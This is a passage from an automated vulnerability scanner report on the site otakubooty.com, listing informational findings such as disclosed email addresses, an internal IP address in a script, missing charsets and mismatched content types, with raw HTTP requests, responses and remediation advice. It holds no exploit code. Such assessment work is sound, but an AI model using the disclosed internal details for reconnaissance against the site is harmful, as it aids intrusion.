</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5802&title=To+Our+Brave+Men+and+Women&bodytext=Thank+you%2C+veterans%2E&topic="><img src="images/diggthisstory.png">
...[SNIP]...
<BR>News item <a href="http://www.japantoday.com/category/national/view/nishizaki-producer-of-anime-yamato-dies-after-falling-off-boat">here</a>; this nice -- I'd even call it definitive -- <a href="http://www.otakuusamagazine.com/Anime/News1/Arrivederci_Yoshinobu_Nishizaki_3911.aspx">write-up on the flamboyant life and times of Yoshinobu Nishizaki</a>
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5801&title=Space+Battleship+Yamato+Producer+Dies+Semi%2DIronically&bodytext=Yoshinobu+Nishizaki%2C+producer+of+Space+Battleship+Yamato%2C+has+died%2E&topic="><img src="images/diggthisstory.png">
...[SNIP]...
<div class="blurb_avatar"><A href="http://littlest-thought.blogspot.com/">Posted By<BR>
...[SNIP]...
</a><a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fotakubooty%2Ecom%2Fshow%5Farticle%2Easp%3Fid%5Farticle%3D5800&title=The+Great+Pumpkin+OB%21&bodytext=Look+at+some+of+the+costume+concoctions+our+crafty+members+have+conjured+up%21&topic="><img src="images/diggthisstory.png">
...[SNIP]...
</strong> Find out more <a href="http://johnedmundrose.com" title="John Edmund Rose, software developer.">about John Rose</a>
...[SNIP]...

5.2. http://otakubooty.com/otaku_help.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /otaku_help.asp?tab=mailpassword HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.3.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:34 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 13331


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
</strong> Find out more <a href="http://johnedmundrose.com" title="John Edmund Rose, software developer.">about John Rose</a>
...[SNIP]...

6. Email addresses disclosed  previous  next
There are 7 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


6.1. http://otakubooty.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /Default.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /Default.asp? HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 19:29:46 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Set-Cookie: ASPSESSIONIDASBCQBRR=NDLOGNJCDHMPLHFJEKFDNPNP; path=/
Vary: Accept-Encoding
Content-Length: 31846


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="mailto:press@otakubooty.com">
...[SNIP]...

6.2. http://otakubooty.com/oa.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /oa.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /oa.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 11311
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->

<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http
...[SNIP]...
<a href="mailto:press@otakubooty.com">
...[SNIP]...

6.3. http://otakubooty.com/of.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /of.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /of.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 35078
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Gen. Ch
...[SNIP]...
<a href="mailto:press@otakubooty.com">
...[SNIP]...

6.4. http://otakubooty.com/otaku_help.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_help.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /otaku_help.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 849360
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Info, H
...[SNIP]...
<a href="mailto:press@otakubooty.com">
...[SNIP]...

6.5. http://otakubooty.com/otaku_news.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_news.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /otaku_news.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 32063
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: OtakuBo
...[SNIP]...
<a href="mailto:press@otakubooty.com">
...[SNIP]...

6.6. http://otakubooty.com/otaku_search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_search.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /otaku_search.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 11 Feb 2011 21:10:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 21505
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Find Me
...[SNIP]...
<a href="mailto:press@otakubooty.com">
...[SNIP]...

6.7. http://otakubooty.com/otaku_signup.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /otaku_signup.asp

Issue detail

The following email address was disclosed in the response:

Request

GET /otaku_signup.asp HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/otaku_help.asp?tab=mailpassword
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=96346818.1297459802.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ASPSESSIONIDASBCQBRR=CPAPGNJCGFADCFPPEODBKAFD; password=; __utma=96346818.797814522.1297452653.1297452653.1297459802.2; __utmc=96346818; __utmb=96346818.4.10.1297459802

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 11 Feb 2011 21:29:39 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: password=; path=/
Vary: Accept-Encoding
Content-Length: 17458


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<html><head><meta http-equiv="Content-Type" content="text/html;charset=Windows-1252"><title>OtakuBooty: Join Ot
...[SNIP]...
<a href="mailto:press@otakubooty.com">
...[SNIP]...

7. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /javascript/ob_min.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /javascript/ob_min.js HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: password=; ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI

Response

HTTP/1.1 200 OK
Cache-Control: max-age=8640000
Content-Type: application/x-javascript
Last-Modified: Fri, 06 Aug 2010 16:34:56 GMT
Accept-Ranges: bytes
ETag: "078a84d8535cb1:391c"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 19:29:46 GMT
Content-Length: 13029

if(typeof(Delicious)=='undefined')Delicious={}
Delicious.Mp3={playimg:null,player:null,go:function(){var all=document.getElementsByTagName('a')
for(var i=0,o;o=all[i];i++){if(o.href.match(/\.mp3$/i)){
...[SNIP]...
tr,chars){chars=chars||"\\s";return str.replace(new RegExp("["+chars+"]+$","g"),"");}
function bannerClick(bannerGUID){var xmlReq;var someURL;xmlReq=getXmlHttpObject();if(xmlReq){if((document.domain=='192.168.1.163')||(document.domain=='talim'))
someURL='http://'+document.domain+':45678/ob_bclick.asp?guid='+bannerGUID;else
someURL='http://'+document.domain+'/ob_bclick.asp?guid='+bannerGUID;xmlReq.open("POST",som
...[SNIP]...

8. HTML does not specify charset  previous  next
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


8.1. http://otakubooty.com/op.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /op.asp

Request

GET /op.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 427
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<font face="Arial" size=2>
<p>ADODB.Field</font> <font face="Arial" size=2>error '800a0bcd'</font>
<p>
<font f
...[SNIP]...

8.2. http://otakubooty.com/show_article.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://otakubooty.com
Path:   /show_article.asp

Request

GET /show_article.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 450
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<font face="Arial" size=2>
<p>ADODB.Field</font> <font face="Arial" size=2>error '800a0bcd'</font>
<p>
<font f
...[SNIP]...

9. Content type incorrectly stated  previous
There are 4 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. http://otakubooty.com/images/articles/5806articlepicture.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://otakubooty.com
Path:   /images/articles/5806articlepicture.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/articles/5806articlepicture.jpg HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: password=; ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI

Response

HTTP/1.1 200 OK
Cache-Control: max-age=8640000
Content-Length: 2939
Content-Type: image/jpeg
Last-Modified: Sat, 01 Jan 2011 08:02:08 GMT
Accept-Ranges: bytes
ETag: "1a361a308aa9cb1:391c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 19:29:59 GMT

GIF89a,...............NNN!.......,....,........................H...........L..........
.....l.....    ....A..uN.TA...-.do......5.....[..c..>...(...gx7..Hg....    ..h.iyVHI.x......9z..zJ.H..3..i$ .....*Z.&
...[SNIP]...

9.2. http://otakubooty.com/images/authors/1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://otakubooty.com
Path:   /images/authors/1.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/authors/1.jpg HTTP/1.1
Host: otakubooty.com
Proxy-Connection: keep-alive
Referer: http://otakubooty.com/Default.asp?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: password=; ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI

Response

HTTP/1.1 200 OK
Cache-Control: max-age=8640000
Content-Length: 1469
Content-Type: image/jpeg
Last-Modified: Fri, 13 Jan 2006 10:10:56 GMT
Accept-Ranges: bytes
ETag: "0f88ba42918c61:391c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 11 Feb 2011 19:29:48 GMT

GIF89a<.:.........".."..}..)5.....g.'PMf9j.ros.....n.i:.?0..;..%sJ6..,..G..'..`...?26.r6..i..M..1..v
.1......!.......,....<.:.....'...lh..,.x0..^.)e^ZW....mX.Xt:^..du....I. z...)...G....`W..j.|zi.....
...[SNIP]...

9.3. http://otakubooty.com/op.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://otakubooty.com
Path:   /op.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /op.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 427
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<font face="Arial" size=2>
<p>ADODB.Field</font> <font face="Arial" size=2>error '800a0bcd'</font>
<p>
<font f
...[SNIP]...

9.4. http://otakubooty.com/show_article.asp  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://otakubooty.com
Path:   /show_article.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /show_article.asp HTTP/1.1
Host: otakubooty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASBCQBRR=MDLOGNJCOIKEIJDIDEJPCJOI; __utmz=96346818.1297452653.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96346818.797814522.1297452653.1297452653.1297452653.1; __utmc=96346818; __utmb=96346818.1.10.1297452653; password=;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 11 Feb 2011 21:10:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 450
Content-Type: text/html
Set-Cookie: password=; path=/
Cache-control: private


<!-- SUPER SECRET DEBUG OUTPUT [CheckForLoginAttempt] No login attempt attempted. -->
<font face="Arial" size=2>
<p>ADODB.Field</font> <font face="Arial" size=2>error '800a0bcd'</font>
<p>
<font f
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sun Feb 13 08:00:22 CST 2011.